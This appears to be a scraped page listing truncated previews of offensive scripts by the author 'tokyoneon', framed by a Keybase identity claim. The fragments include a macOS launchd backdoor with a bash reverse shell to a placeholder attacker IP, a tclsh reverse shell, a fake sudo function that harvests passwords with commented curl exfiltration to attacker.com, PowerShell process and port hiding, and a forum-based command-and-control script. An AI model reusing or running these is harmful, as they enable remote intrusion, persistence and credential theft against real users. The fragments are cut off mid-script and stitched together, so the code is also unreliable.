I hereby claim:
- I am tokyoneon on github.
- I am tokyoneon (https://keybase.io/tokyoneon) on keybase.
- I have a public key whose fingerprint is 94BF C36E A65D 8973 30D6 6199 C432 53B8 CE95 B841
To claim this, I am signing this object:
# write-up: https://www.varonis.com/blog/author/tokyoneon/ | |
# only proceed when `whoami /groups` shows the High Mandatory Level label SID (S-1-16-12288), i.e. the PowerShell session is already running elevated; this is a precondition check, not an elevation bypass
if (whoami /groups | findstr /i "S-1-16-12288") | |
{ | |
# start the attack as a background process so the PowerShell terminal does not stall when opened
Start-Job { | |
# where to write data during the attack? | |
$temp = "$env:TEMP" |
# write-up: https://null-byte.com/powershell-evasion-0329395/ | |
# create the profile.ps1 directory if it doesn't exist | |
# cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden" | |
# processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1 | |
$excludeFiles = "payload|evil|tokyoneon" | |
# listening ports and PIDs to exclude | |
$excludePorts = "4444|1337|31337|55555" |
# writeup: https://null-byte.com/backdoor-0325535/ | |
# create bash script executable | |
echo -e '#!/bin/bash\nexport PS1="backdoor> "\nbash -i >& /dev/tcp/ATTACKER-IP-ADDRESS/2222 0>&1' >/Library/Caches/persistence | |
# mark the dropped script executable (chmod +x; this does not change its owner or privileges)
chmod +x /Library/Caches/persistence | |
# create launchd service | |
printf '<?xml version="1.0" encoding="UTF-8"?> |
#!/bin/bash | |
# https://null-byte.com/turn-forums-into-c-c-servers-0196708/ | |
while true; do | |
forumUser="tokyoneon"; | |
username="tokyoneon@email.com"; | |
password="treHGFd76547^%$"; | |
cookies='/tmp/forum_cookies'; | |
function urlencode () |
#!/bin/bash | |
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/ | |
# `if` statement to determine whether the message is a 'response' one
# This is the command being executed and embedded in the photo. | |
# Single-quotes are used here to help with escaping special | |
# characters within the desired command(s). | |
exfilData='ls -lah "/Users/$USER/"' | |
# Where the attackers PHP server is located. This needs to be |
# https://null-byte.wonderhowto.com/how-to/hacking-macos-use-one-tclsh-command-bypass-antivirus-protections-0186330/
# One-line tclsh reverse shell. Opens a TCP connection to the hard-coded
# listener 1.2.3.4:9999 (placeholder address/port), then loops: writes a
# "hacker> " prompt, reads one line from the socket into c, and runs it via
# `eval "exec $c"` — the remote side gets arbitrary command execution with
# the privileges of whoever is running tclsh. A failing exec is swallowed by
# `catch` and nothing is written back, so the operator sees silence on error.
# `while 42` has a constant-true condition, so the trailing `close $s` is
# unreachable; the loop only ends on an uncaught error (e.g. from puts/flush
# once the socket is gone). Defensively, tclsh making an outbound TCP
# connection is the observable here.
set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;
#!/bin/bash | |
# https://null-byte.wonderhowto.com/how-to/hacking-macos-break-into-macbook-encrypted-with-filevault-0185177/ | |
# checks to ensure all 3 args are present | |
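# Argument check: the script needs a block device, a wordlist and the
# -killswitch flag. A missing third argument is a usage error, so the
# message goes to stderr and the exit status is non-zero (the original
# exited 0 here, which made a misuse indistinguishable from success to
# any wrapper or shell that checks $?).
if [[ -z "${3:-}" ]]; then
  printf '\nusage: $ ./script.sh /dev/sdaX passwords.list -killswitch\n\n' >&2
  exit 2
fi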
function sudo () | |
{ | |
# https://null-byte.com/privesc-0194190/ | |
realsudo="$(which sudo)"; | |
read -s -p "[sudo] password for $USER: " inputPasswd; | |
printf "\n"; | |
printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt; | |
# encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1; | |
# curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1; | |
$realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1; |
`/ tokyoneon ~/backdoor-apk/backdoor-apk | |
> ./backdoor-apk.sh 4.apk | |
________ | |
/ ______ \ | |
|| _ _ || | |
||| || ||| AAAAAA PPPPPPP KKK KKK | |
|||_||_||| AAA AAA PPP PPP KKK KKK | |
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK | |
||| || ||| AAAAAAAA PPPPPPPP KKK KKK | |
|||_||_||| AAA AAA PPP KKK KKK |
I hereby claim:
To claim this, I am signing this object: